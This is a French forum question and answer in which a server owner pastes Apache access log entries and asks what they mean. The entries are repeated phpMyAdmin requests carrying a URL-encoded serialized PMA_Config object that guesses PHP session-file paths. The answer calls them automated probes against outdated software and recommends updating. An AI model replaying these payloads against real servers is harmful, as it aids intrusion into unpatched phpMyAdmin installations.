Ces demandes malveillantes sont-elles dans mon journal d'accès apache?

J'ai donc remarqué que mon journal d'accès apache est rempli de ceci:

180.179.206.84 - - [06/Feb/2013:14:35:45 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A46%3A%22%2Fvar%2Ftmp%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:46 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:47 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A50%3A%22%2Fvar%2Flib%2Fphp%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:47 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:48 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A51%3A%22%2Fvar%2Flib%2Fphp4%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:48 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:49 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A51%3A%22%2Fvar%2Flib%2Fphp5%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:50 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:50 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A58%3A%22%2Fvar%2Flib%2Fphp%2Fsession%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:51 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:52 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A59%3A%22%2Fvar%2Flib%2Fphp4%2Fsession%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:52 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:53 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A59%3A%22%2Fvar%2Flib%2Fphp5%2Fsession%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:53 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:54 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A53%3A%22%2Fshared%2Fsessionssess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:55 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:55 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A55%3A%22%2Fvar%2Fphp_sessions%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 

Il ne semble pas que cette adresse fasse vraiment quelque chose de dangereux, mais il semble qu'ils essaient de briser quelque chose. Les IP viennent d'Italie et d'Inde de tous les endroits. Notez que l'utilisateur-agent est une ancienne version de Firefox (même si je sais que c'est facile de falsifier). J'ai remarqué un flux constant de trafic entrant de 20 kbit / s vers mon site personnel (ce qui, honnêtement, ne voit jamais le trafic. J'avais juste envie de savoir si quelqu'un avait une idée ou une information sur une attaque spécifique qu'ils essayaient de faire ici. Je pourrais interdire les IP, mais Il y a beaucoup de monde venant de différents endroits, donc je pense que cela pourrait être un peu futile.

Tout serveur public verra ces tentatives (et beaucoup, beaucoup plus ciblant d'autres logiciels généralement installés). Ils sont automatisés, généralement effectués à partir d'outre-mer / Tor / botnets, et il y a suffisamment de personnes qui essayent que le blocage des IP soit essentiellement inutile.

Oui, ils sont malveillants, mais non, ils ne valent pas vraiment être fous.

Ceux-ci visent généralement des versions anciennes de choses comme phpMyAdmin, WordPress, Drupal et d'autres outils communs avec des vulnérabilités connues – gardez votre code tiers mis à jour et vous devriez être bien.